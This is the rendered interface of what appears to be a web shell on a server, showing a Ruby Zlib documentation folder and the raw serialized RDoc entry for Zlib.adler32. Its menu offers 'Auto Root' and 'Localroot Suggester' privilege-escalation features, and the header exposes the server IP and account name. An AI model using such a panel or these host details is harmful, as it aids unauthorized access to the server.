Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ri /
system /
Zlib /
Delete
Unzip
Name
Size
Permission
Date
Action
BufError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
DataError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Deflate
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Error
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GzipFile
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GzipReader
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GzipWriter
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
InProgressError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Inflate
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
MemError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
NeedDict
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
StreamEnd
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
StreamError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
VersionError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
ZStream
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
adler32-c.ri
914
B
-rw-r--r--
2026-04-07 16:51
adler32_combine-c.ri
540
B
-rw-r--r--
2026-04-07 16:51
cdesc-Zlib.ri
10.12
KB
-rw-r--r--
2026-04-07 16:51
crc32-c.ri
707
B
-rw-r--r--
2026-04-07 16:51
crc32_combine-c.ri
518
B
-rw-r--r--
2026-04-07 16:51
crc_table-c.ri
329
B
-rw-r--r--
2026-04-07 16:51
deflate-c.ri
875
B
-rw-r--r--
2026-04-07 16:51
gunzip-c.ri
700
B
-rw-r--r--
2026-04-07 16:51
gzip-c.ri
918
B
-rw-r--r--
2026-04-07 16:51
inflate-c.ri
789
B
-rw-r--r--
2026-04-07 16:51
zlib_version-c.ri
340
B
-rw-r--r--
2026-04-07 16:51
Save
Rename
U:RDoc::AnyMethod[iI"adler32:ETI"Zlib::adler32;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I"MCalculates Adler-32 checksum for +string+, and returns updated value of ;TI"P+adler+. If +string+ is omitted, it returns the Adler-32 initial value. If ;TI"P+adler+ is omitted, it assumes that the initial value is given to +adler+. ;TI"OIf +string+ is an IO instance, reads from the IO until the IO returns nil ;TI"+and returns Adler-32 of all read data.;To:RDoc::Markup::BlankLine o; ; [I"Example usage:;T@o:RDoc::Markup::Verbatim; [ I"require "zlib" ;TI" ;TI"data = "foo" ;TI"=puts "Adler32 checksum: #{Zlib.adler32(data).to_s(16)}" ;TI""#=> Adler32 checksum: 2820145;T:@format0: @fileI"ext/zlib/zlib.c;T:0@omit_headings_from_table_of_contents_below0I"!Zlib.adler32(string, adler) ;T0[ I"(*args);T@FI" Zlib;TcRDoc::NormalModule00